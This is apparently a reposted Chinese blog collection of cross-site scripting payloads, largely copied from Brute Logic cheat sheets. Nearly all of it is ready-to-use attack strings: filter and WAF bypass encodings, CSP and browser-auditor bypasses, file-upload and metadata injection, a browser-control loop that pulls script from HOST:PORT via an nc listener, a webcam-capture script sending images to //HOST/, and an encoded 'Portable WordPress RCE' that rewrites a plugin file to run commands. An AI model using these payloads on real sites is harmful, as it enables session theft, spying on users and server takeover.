1715天 墨茶

Never Say Never

珍藏多年的xss

墨茶    4年前  3.6k次浏览  0条评论  30017字   转载

本文收集与互联网

XSS 101

<h1>Hello,<script>alert(1)</script>!</h1>

1. With <script> tag
<script>alert(1)</script>

2. With regular HTML tags

2.1 Event-based

<TAG EVENT=alert(1)>
<body onload=alert(1)>
<img src=1 onerror=alert(1)>
<svg onload=alert(1)>
<x onmouseover=alert(1)>

2.2 Resource-based

<TAG RESOURCE=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<object data=javascript:alert(1)>
<script>alert(document.domain)</script>

2.1. Steal an user session on the vulnerable website (including admins)

2.2. Capture the keys pressed by the user

2.3. Deface the page, serving any type of content

2.4. Trick the user into giving his/her credentials by means of a fake HTML form

2.5. Crash the browser (local denial of service)

2.6. Force download of files

2.7. Redirect user's browser to another website where his/her machine can be

compromised by memory exploits

data伪协议的格式是:
data:[<MIME-type>][;charset=<encoding>][;base64],<data>

<script src="data:text/html;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script>
<script src=data:text/html;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ==></script>
<script src=data:text/html;,alert(document.cookie)></script>
<script src=data:text/html,alert(document.cookie)></script>
<script src=data:,alert(document.cookie)></script>
<script src="data:text/html;base64,YWxlcnQoMSk="></script>
<script src=data:text/html;base64,YWxlcnQoMSk=></script>
<script src=data:text/html;,alert(1)></script>
<script src=data:text/html,alert(1)></script>
<script src=data:,alert(1)></script>

<body><svg><x><script>alert(1)</script></x></svg></body>
<svg><x><script>alert(1)</x>
<svg><a><script>alert(1)</a>

XSS Cheat Sheet

HTML Context Tag Injection

<svg onload=alert(1)>
"><svg onload=alert(1)//

HTML Context Inline Injection

"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//

Javascript Context Code Injection

'-alert(1)-'
'-alert(1)//

Javascript Context Code Injection (escaping the escape)

\'-alert(1)//

Javascript Context Tag Injection

</script><svg onload=alert(1)>

PHP_SELF Injection

http://DOMAIN/PAGE.php/"><svg onload=alert(1)>

Without Parenthesis

<svg onload=alert`1`>
<svg onload=alert(1)>
<svg onload=alert(1)>
<svg onload=alert(1)>

Filter Bypass Alert Obfuscation

(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)

Body Tag

<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><x id=x>#x
<body onresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1! (MSIE)

Miscellaneous Vectors

<marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me!

Agnostic Event Handlers

<x contenteditable onblur=alert(1)>lose focus!
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x onmousedown=alert(1)>click this!
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<x contenteditable onpaste=alert(1)>paste here!

Agnostic Event Handlers

<brute contenteditable onblur=alert(1)>lose focus!
<brute onclick=alert(1)>click this!
<brute oncopy=alert(1)>copy this!
<brute oncontextmenu=alert(1)>right click this!
<brute oncut=alert(1)>copy this!
<brute ondblclick=alert(1)>double click this!
<brute ondrag=alert(1)>drag this!
<brute contenteditable onfocus=alert(1)>focus this!
<brute contenteditable oninput=alert(1)>input here!
<brute contenteditable onkeydown=alert(1)>press any key!
<brute contenteditable onkeypress=alert(1)>press any key!
<brute contenteditable onkeyup=alert(1)>press any key!
<brute onmousedown=alert(1)>click this!
<brute onmousemove=alert(1)>hover this!
<brute onmouseout=alert(1)>hover this!
<brute onmouseover=alert(1)>hover this!
<brute onmouseup=alert(1)>click this!
<brute contenteditable onpaste=alert(1)>paste here!
<brute style=font-size:500px onmouseover=alert(1)>0000
<brute style=font-size:500px onmouseover=alert(1)>0001
<brute style=font-size:500px onmouseover=alert(1)>0002
<brute style=font-size:500px onmouseover=alert(1)>0003

Code Reuse Inline Script

<script>alert(1)//
<script>alert(1)<!–
Code Reuse Regular Script
<script src=//brutelogic.com.br/1.js>
<script src=//3334957647/1>

Filter Bypass Generic Tag + Handler

Encoding

<x onxxx=1
<%78 onxxx=1
<x %6Fnxxx=1
<x o%6Exxx=1
<x on%78xx=1
<x onxxx%3D1

Mixed Case

<X onxxx=1
<x OnXxx=1
<X OnXxx=1 

Doubling

<x onxxx=1 onxxx=1

Spacers

<x/onxxx=1
<x%09onxxx=1
<x%0Aonxxx=1
<x%0Conxxx=1
<x%0Donxxx=1
<x%2Fonxxx=1

Quotes

<x 1='1'onxxx=1
<x 1="1"onxxx=1

Stripping

<[S]x onx[S]xx=1
[S] = stripped char or string

Mimetism

<x </onxxx=1
<x 1=">" onxxx=1
<http://onxxx%3D1/

Generic Source Breaking

<x onxxx=alert(1) 1='

Source-Breaking Injections

onafterscriptexecute

onbeforescriptexecute

if (brute)
alert("Congratz, buddy!");
else
alert("Almost there, try again.");

Browser Control

<svg onload=setInterval(function(){with(document)body.
appendChild(createElement('script')).src='//HOST:PORT'},0)>
$ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done

Using XSS to Control a Browser

<svg onload=setInterval(function(){d=document;
z=d.createElement("script");z.src="//HOST:PORT";
d.body.appendChild(z)},0)>
setInterval(code, 0)
function(){code}
d=document;
z=d.createElement("script");
z.src="//HOST:PORT";
d.body.appendChild(z)
<svg/onload=setInterval(function(){with(document)body.
appendChild(createElement("script")).src="//HOST:PORT"},0)>
$ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done

Multi Reflection

Double Reflection

Single Input

'onload=alert(1)><svg/1='
Single Input (script-based)
'>alert(1)</script><script/1='
*/alert(1)</script><script>/*

Triple Reflection

Single Input

*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='

Single Input (script-based)

*/</script>'>alert(1)/*<script/1='

Multi Input

Double Input

p=<svg/1='&q='onload=alert(1)>

Triple Input

p=<svg 1='&q='onload='/*&r=*/alert(1)'>

Multi Reflection XSS

<svg onload=write(1)>
 p='onload=alert(1)><svg/1='
'onload=alert(1)><svg/1='
… [code] …
'onload=alert(1)><svg/1='
p='>alert(1)</script><script/1='
p=*/alert(1)</script><script>/*
*/alert(1)</script><script>/*
… [code] …
*/alert(1)</script><script>/*
p=*/alert(1)">'onload="/*<svg/1='
p=`-alert(1)">'onload="`<svg/1='
`-alert(1)">'onload="`<svg/1='
… [code] …
`-alert(1)">'onload="`<svg/1='
… [code] …
`-alert(1)">'onload="`<svg/1='
p=*/</script>'>alert(1)/*<script/1='
*/</script>'>alert(1)/*<script/1='
… [code] …
*/</script>'>alert(1)/*<script/1='
… [code] …
*/</script>'>alert(1)/*<script/1='
p=<svg/1='&q='onload=alert(1)>
p=<svg 1='&q='onload='/*&r=*/alert(1)'>
var n = {a: "$p", b: "$p"};
(double reflection, single input $p)
var n = {a: "$p", b: "$q"};
(double reflection, double input $p and $q)

INPUT

p=-alert(1)}//\
RESULT*
var n = {a: "-alert(1)}//\", b: "-alert(1)}//\"};

INPUT

p=\&q=-alert(1)//
RESULT*
var n = {a: "\", b: "-alert(1)}//"};

Without Event Handlers

<script>alert(1)</script>
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/onload=alert(1)>>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>

XSS Without Event Handlers

data:text/html,<script>alert(1)</script>

data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

1) (no attribute)

<script>alert(1)</script>

2) src

<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)> *

3) href

<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click *

4) action

<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click> *

5) formaction

<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=http://brutelogic.com.br/webgun/img/youtube1.jpg>
<isindex formaction=javascript:alert(1) type=submit value=click> *

6) data

<object data=javascript:alert(1)> *

7) srcdoc

<iframe srcdoc=%26lt;svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>

8) xlink:href

<svg><script xlink:href=data:,alert(1)></script>
<svg><script xlink:href=data:,alert(1) /> *
<math><brute xlink:href=javascript:alert(1)>click *

9) from

<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=%26>

Mobile Only

Event Handlers

<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchcancel=alert(1)>
<body onorientationchange=alert(1)>

Javascript

Properties

<svg onload=alert(navigator.connection.type)>
<svg onload=alert(navigator.battery.level)>
<svg onload=alert(navigator.battery.dischargingTime)>
<svg onload=alert(navigator.battery.charging)>

Functions

<svg onload=navigator.vibrate(500)>
<svg onload=navigator.vibrate([500,300,100])>

XSS in Mobile Devices

<body onorientationchange=alert(orientation)>
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchcancel=alert(1)>
<svg onload=alert(navigator.connection.type)>
<svg onload=alert(navigator.battery.level)>
<svg onload=alert(navigator.battery.dischargingTime)>
<svg onload=alert(navigator.battery.charging)>
<script>
navigator.geolocation.getCurrentPosition(function(p){
alert('Latitude:'+p.coords.latitude+',Longitude:'+
p.coords.longitude+',Altitude:'+p.coords.altitude);})
</script>
<script>
d=document;
v=d.createElement('video');
c=d.createElement('canvas');
c.width=640;
c.height=480;
navigator.webkitGetUserMedia({'video':true},function(s){
v.src=URL.createObjectURL(s);v.play()},function(){});
c2=c.getContext('2d');
x='c2.drawImage(v,0,0,640,480);fetch("//HOST/"+c2.canvas.toDataURL())';
setInterval(x,5000);
</script>
open(c2.canvas.toDataURL())
<svg onload=navigator.vibrate(500)>
<svg onload=navigator.vibrate([500,300,100])>

Generic Self to Regular XSS

<iframe src=LOGOUT_URL onload=forms[0].submit()>
</iframe><form method=post action=LOGIN_URL>
<input name=USERNAME_PARAMETER_NAME value=USERNAME>
<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>

Leveraging Self-XSS

POST to GET

Copy & Paste

XSS + CSRF

<iframe src=LOGOUT_URL onload=forms[0].submit()>
</iframe><form method=post action=LOGIN_URL>
<input name=USERNAME_PARAMETER_NAME value=USERNAME>
<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
<iframe src=//localhost/self/logout.php
onload=forms[0].submit()></iframe><form method=POST
action=//localhost/self/login.php?returnURL=changemail.php>
<input name=username value=brute>
<input name=password value=logic>

File Upload

Injection in Filename

"><img src=1 onerror=alert(1)>.gif

Injection in Metadata

$ exiftool -Artist='"><img src=1 onerror=alert(1)>' FILENAME.jpeg

Injection with SVG File

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
Injection with GIF File as Source of Script (CSP Bypass)
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

File Upload XSS

1) Filename

2) Metadata

$ exiftool -FIELD=XSS FILE

$ exiftool -Artist=' "><img src=1 onerror=alert(document.domain)>' brute.jpeg

3) Content

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

4) Source

GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
Google Chrome Auditor Bypass (up to v51)
<script src="data:,alert(1)//
"><script src=data:,alert(1)//
<script src="//brutelogic.com.br/1.js#
"><script src=//brutelogic.com.br/1.js#
<link rel=import href="data:text/html,<script>alert(1)</script>
"><link rel=import href=data:text/html,<script>alert(1)</script>

Chrome XSS Bypass

 "><script src=data:%26comma;alert(1)-"
 <input value="INPUT">
 <input value=""><script src=data:%26comma;alert(1)-"">
 <script src="URL"></script>
<script type="text/javascript"></script>

PHP File for XHR Remote Call

<?php header("Access-Control-Allow-Origin: *"); ?>
<img src=1 onerror=alert(1)>

CORS Enabled XSS

<?php header("Access-Control-Allow-Origin: *"); ?>
<img src=1 onerror=alert(document.domain)>
#data:text/html,<img src=1 onerror=alert(document.domain)

Server Log Avoidance

<svg onload=eval(URL.slice(-8))>#alert(1)
<svg onload=eval(location.hash.slice(1)>#alert(1)
<svg onload=innerHTML=location.hash>#<script>alert(1)</script>

Avoiding XSS Detection

with(document)body.appendChild(createElement('script')).src='//DOMAIN'
<svg/onload=eval(location.hash.slice(1))>#with(document)
body.appendChild(createElement('script')).src='//DOMAIN'
#with(document)body.appendChild(createElement
(/script/.source)).src=atob(/Ly9icnV0ZWxvZ2ljLmNvbS5ici8y/.source)
<svg/onload=eval(atob(location.hash.slice(1)))>
#d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZW
F0ZUVsZW1lbnQoL3NjcmlwdC8uc291cmNlKSkuc3JjPWF0b
2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNv
dXJjZSk=
<svg/onload=eval(atob(URL.slice(-148)))>
#d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZW
F0ZUVsZW1lbnQoL3NjcmlwdC8uc291cmNlKSkuc3JjPWF0b
2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNv
dXJjZSk=

Shortest PoC

<base href=//0>
$ while:; do echo "alert(1)" | nc -lp80; done
Portable WordPress RCE
<script/src="data:,eval(atob(location.hash.slice(1)))//#
#eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd
Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w
aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n
X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC
5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV
RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE
9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl
wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD
Qp4LnNlbmQoJCk=
http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD

* In URLs:
& => %26 , # => %23 , + => %2B

<a href=javascript:alert(1)>
Javascript:alert(1)

(URL-encoded form)
Javas%26%2399;ript:alert(1)

<iframe src=javascript:alert(1)>
http(s)://host/page?p=XSS
<object data=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>
<embed src=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>
<iframe src=?p=%26lt;svg/o%256Eload%26equals;alert(1)%26gt;>
"><iframe src="/tests/cors/%23/tests/auditor.php?q1=<img/src=x onerror=alert(1)"
%0aalert(1);/"><script>///
<form action="http://brutelogic.com.br/chall/minified.php" method="POST" enctype="multipart/form-data">
<textarea name=p id=p>"
alert(1)-/><script>///</textarea>
</form>
<script>document.forms[0].submit(); </script>
*//"><script>/*alert(1)//
</input/"><svg><script>alert(1)//

Calling Remote Script With Event Handlers

1 – XHR

"var x=new XMLHttpRequest();x.open('GET','//0');x.send();
x.onreadystatechange=function(){if(this.readyState==4){write(x.responseText)}}"

2 – Fetch

fetch('//0').then(function(r){r.text().then(function(w){write(w)})})

3 – Create Element

with(top)body.appendChild (createElement('script')).src='//0'

4 – jQuery Get

$.get('//0',function(r){write(r)})>

5 – jQuery Get Script

$.getScript('//0')

The Easiest Way to Bypass XSS Mitigations

echo $_GET["p"];
echo str_replace(" ", "", $_GET["q"]);
echo $_GET["p"];
echo str_ireplace("<script", "", $_GET["q"]);
echo str_ireplace("<script","InvalidTag", $_GET["r"]);
echo str_ireplace("<script","<InvalidTag", $_GET["s"]);

XSS Authority Abuse

http://alert(1)@brutelogic.com.br/webgun/test.php?p=<svg+onload=eval(URL.slice(7,15))>
http://javascript:alert(1)@brutelogic.com.br/webgun/test.php?p=<svg+onload=location=URL.slice(7,26)>

Bypassing Javascript Overrides

<svg onload=alert(1)>
<svg onload=document.write('XSS')>
<svg onload=document.writeln(decodeURI(location.hash))>#<img src=1 onerror=alert(1)>

The Shortest Reflected XSS Attack Possible

<script src="INPUT"></script
<script src="//INPUT"></script>
<base href=//0>

Transcending Context-Based Filters

1) among tags

2) inside a tag

3) in a script section

1) preg_replace("/\<script|=/i", "-", $_REQUEST['q']);

2) preg_replace("/on\w+\s*=|\>/i", "-", $_REQUEST['q']);

3) htmlspecialchars($_REQUEST['q'], ENT_QUOTES);

<math><brute href=javascript:alert(1)>

1) <math>

2) " href=javascript:alert(1)

1) <math><!–

2) " href=javascript:alert(1)

<math><!–" href=javascript:alert(1)//
" href=javascript:alert(1) <math><!–
lol video<!–"href=javascript:alert(1) style=font-size:50px;
display:block;color:transparent;
background:url('//brutelogic.com.br/webgun/img/youtube1.jpg');
background-repeat:no-repeat –><math><!–
<svg><!–'-alert(1)-'
'-alert(1)-'<svg><!–
" accesskey=x onclick=alert(1) 1='

Location Based Payloads – Part IV

Document Properties Scheme

protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3
protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3
protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3
protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3
protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3
protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3
protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3
protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3
protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3
protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3
previousSibling.nodeValue, document.body.textContent*
location.search, tagName, nodeName, outerHTML
textContent, nextSibling.nodeValue, firstChild.nodeValue, lastChild.nodeValue, innerHTML
location.hash

Location Based Payloads – Part III

– Location
– Location Self
– Location Self Plus

before < [itself [inside]] > after # hash
Before: everything before the tag.
Itself: anything that uses the tag name.
Inside: any attribute inside the tag.
After: everything after the tag until hash.
Hash: everything after the # sign.

1) Location

1.1) Location Itself+After+Hash (tagName+innerHTML+location.hash)

<javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:/*click me!#*/alert(9)
<javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:'click me!#'-alert(9)

1.2) Location Itself+Hash (tagName+URL)

<javascript: onclick=location=tagName%2bURL>click me!#%0Aalert(1)
javascript: + http://domain/page?p=<javascript: onclick=location=tagName%2bURL>click me!#%0Aalert(1)
<javascript:"-' onclick=location=tagName%2bURL>click me!#'-alert(1)
javascript:"-' + http://domain/page?p=<javascript:"-' onclick=location=tagName%2bURL>click me!#'-alert(1)

1.3) Location After+Hash (innerHTML+URL)

<j onclick=location=innerHTML%2bURL>javascript:"-'click me!</j>#'-alert(1)
javascript:"-'click me! + http://domain/page?p=<j onclick=location=innerHTML%2bURL>javascript:"-'click me!</j>#'-alert(1)
<j onclick=location=innerHTML%2bURL>javascript:</j>#%0Aalert(1)
javascript: + http://domain/page?p=<j onclick=location=innerHTML%2bURL>javascript:</j>#%0Aalert(1)

1.4) Location Itself+After+Hash (tagName+innerHTML+URL)

<javas onclick=location=tagName%2binnerHTML%2bURL>cript:"-'click me!</javas>#'-alert(1)
javas + cript:"-'click me! + http://domain/page?p=<javas%20onclick=location=tagName%2binnerHTML%2bURL>cript:"-'click me!</javas>#'-alert(1)
<javas onclick=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)
javas + cript: + http://domain/page?p=<javas onclick=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)

1.5) Location Itself+Before (tagName+previous.Sibling)

"-alert(1)<javascript:" onclick=location=tagName%2bpreviousSibling.nodeValue>click me!
javascript:" + "-alert(1)

1.6) Location Itself+After+Before (tagName+innerHTML+previous.Sibling)

"-alert(1)<javas onclick=location=tagName%2binnerHTML%2bpreviousSibling.nodeValue>cript:"click me!
javas + cript:" + "-alert(1)

1.7) Location After+Itself (innerHTML+outerHTML)

<alert(1)<!– onclick=location=innerHTML%2bouterHTML>javascript:1/*click me!*/</alert(1)<!–>
javascript:1/*click me!*/ + <alert(1)<!– onclick=location=innerHTML%2bouterHTML>
<j 1="*/""-alert(1)<!– onclick=location=innerHTML%2bouterHTML>javascript:/*click me!
javascript:/* + <j 1="*/""-alert(1)<!– onclick=location=innerHTML%2bouterHTML>

1.8) Location After+Before+Itself (innerHTML+previousSibling+outerHTML)

*/"<j"-alert(1)<!– onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
javascript:/*click me! + */" + <x"-alert(9)<!– onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>
*/"<j 1=-alert(9)// onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
javascript:/*click me! + */" + <x 1=" -alert(9)//" onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>

1.9) Location After (innerHTML)

<j onclick=location=innerHTML>javascript%26colon;alert(1)//
javascript:alert(1)//

1.10) Location Inside (name+id)

<iframe id=t:alert(1) name=javascrip onload=location=name%2bid>
javascrip + t:alert(1)

2) Location Self

2.1) Location Self Inside

<svg id=?p=<svg/onload=alert(1)%2B onload=location=id>
http://domain/page?p=<svg/onload=alert(1)+
<svg id=?p=<script/src=//3237054390/1%2B onload=location=id>
http://domain/page?p=<script/src=//3237054390/1+

2.2) Location Self After

<j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)>
http://domain/page?p=<svg/onload=alert(1)>

3) Location Self Plus

3.1) Location Self Plus Itself

<j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me!
http://domain/page?p=<j%26p=<svg%2Bonload=alert(1)%20onclick=location%2B=outerHTML>click%20me!<j&p=<svg+onload=alert(1) onclick="location+=outerHTML">

3.2) Location Self Plus After

<j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>
http://domain/page?p=<j%20onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>&p=<svg/onload=alert(1)>

3.3) Location Self Plus Before

%26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body.textContent>click me!
http://domain/page?p=%26p=%26lt;svg/onload=alert(1)><j%20onclick=location%2B=document.body.textContent>click%20me![BODY_CONTENT]&p=<svg/onload=alert(1)>click me!

Location Based Payloads – Part II

<svg onload=alert(tagName)>
<javascript onclick=alert(tagName)>click me!
<javascript onclick=alert(tagName%2Blocation.hash)>click me!#:alert(1)
<javascript: onclick=alert(tagName%2Blocation.hash)>click me!#alert(1)
<javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>/*click me!#*/alert(1)
<javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/alert(1)
Result => javascript: + /*click me! + #*/alert(1)
<javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>'click me!#'-alert(1)
Result => javascript: +'click me! + #'-alert(1)
<javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>'click me!</javascript:>#'-alert(1)
javascript + :'click me! + #'-alert(1)
javascrip + t:'click me! + #'-alert(1)
javas + cript:'click me! + #'-alert(1)
Location Based Payloads – Part I
<svg/onload=location='javascript:alert(1)'>
<svg/onload=location=location.hash.substr(1)>#javascript:alert(1)
Result => javascript:alert(1)
<svg/onload=location='javas'%2B'cript:'%2B
'ale'%2B'rt'%2Blocation.hash.substr(1)>#(1)
Result => javas + cript: + ale + rt + (1)
<svg/onload=location=/javas/.source%2B/cript:/.source%2B
/ale/.source%2B/rt/.source%2Blocation.hash.substr(1)>#(1)
Result => javas + script: + ale + rt + (1)
<svg/onload=location=/javas/.source%2B/cript:/.source%2B/ale/.source
%2B/rt/.source%2Blocation.hash[1]%2B1%2Blocation.hash[2]>#()
Result => javas + cript: + ale + rt + ( + 1 + )

Filter Bypass Procedure

 #XSS vs WAF

1) use <x & jump to event handler

2) use onxxx=yyy & find number of x it accepts

3) test them & change tag accordingly

4) put js

— Brute (@brutelogic) October 10, 2015

<x onxxx=1

Example:
<x onxxx=1     -> pass
<x onxxxx=1   -> pass
<x onxxxxx=1 -> block

Event handlers with up to 6 chars:
oncut, onblur, oncopy, ondrag, ondrop, onhelp, onload, onplay, onshow

1) Encoding

<x onxxx=1
<%78 onxxx=1
<x %6Fnxxx=1
<x o%6Exxx=1
<x on%78xx=1
<x onxxx%3D1

2) Mixed Case

<X onxxx=1
<x ONxxx=1
<x OnXxx=1
<X OnXxx=1

3) Doubling

<x onxxx=1 onxxx=1

4) Spacers

<x/onxxx=1
<x%09onxxx=1
<x%0Aonxxx=1
<x%0Conxxx=1
<x%0Donxxx=1
<x%2Fonxxx=1

5) Quotes

<x 1='1'onxxx=1
<x 1="1"onxxx=1

6) Mimetism

<x </onxxx=1 (mimics a closing tag)
<x 1=">" onxxx=1 (mimics a text outside of the tag)
<http://onxxx%3D1/ (mimics an URL)

7) Combo

<x%2F1=">%22OnXxx%3D1
Existing Code Reuse
<script>alert(1)//
<script>alert(1)<!–

1) Before injection:

<input type="text" value=""><script type="text/javascript"> function x(){ do something }</script>

2) After injection:

<input type="text" value=""><script>alert(1)//"><script type="text/javascript"> function x(){ do something }</script>
<script src=//brutelogic.com.br/1>
<script src=//3334957647/1>
http://brutelogic.com.br/webgun/test.php?p=<script src=//3334957647/1>
http://brutelogic.com.br/webgun/test.php?p=<brute id=test onmouseover=alert(1)>AAAA
http://brutelogic.com.br/webgun/test.php?p=<brute onmouseover=pop(1)>AAAA

XSS Payload Scheme

<tag handler=code>
<b onclick=alert(1)>click me!
<img src=x onerror=alert(1)>
<frameset><frame src onload=alert(1)>
extra1 <tag extra2 handler=code> extra3
extra1 <tag handler=code extra2> extra3
<svg/onload=alert(1)>
extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3
extra1 <tag spacer1 handler spacer3 = spacer4 code spacer5 extra2> extra3 (without spacer2)
<table><thead%0Cstyle=font-size:700px%0Donmouseover%0A=%0Bconfirm(1)%09><td>AAAAAAAAA
<img src=1.png onload=alert(7)>
<style onload=alert(8)>
<input src=1.png type="image" onload=alert(3)>
<script src=0.js onerror=alert(1)></script>
<script src=1.js onload=alert(5)></script>
<listing><img src=x onerror=alert(32)></listing>

<img onerror=MsgBox+9 language=vbs src=a>
<img onerror=MsgBox+8 language=vbscript src=a>

====
<svg[0X09]onload=alert()>
<svg[0X0A]onload=alert()>
<svg[0X0C]onload=alert()>
<svg[0X0D]onload=alert()>
<svg[0X020]onload=alert()>
<svg[0X2F]onload=alert()>
====

<meta http-equiv="content-type" content="text/html;charset=utf-7"> +ADw-script+AD4-alert(123); +ADw-/script+AD4-

<svg/onload=eval(location.hash.slice(1))>
<svg/onload=eval(location.hash.substr(1))>
<svg/onload=eval(location.hash.split('#')[1])>
<svg><g onload=alert(55)>
<svg onload=alert(54)>

<image src=1 onerror=alert(53)>
<b/ondrag=alert()>x
<audio src=x onerror=alert(51)>

<frameset onload=alert(40)>
<select onfocus=alert(36) autofocus>
<textarea onfocus=alert(37) autofocus>
<keygen onfocus=alert(38) autofocus>
<input onfocus=alert(33) autofocus>

<iframe/onload=alert(document.domain)></iframe>

<body/onload=alert(25)>
<img src=x onerror=alert(24)>
<a onclick=alert(18)>M
<a onmouseover=alert(17)>M

===DOM===
<input onclick="document.write('<img src=x onerror=alert(1)>');">
<input onclick="document.write('<img src=x onerror=alert(1)>');">

大概就这些……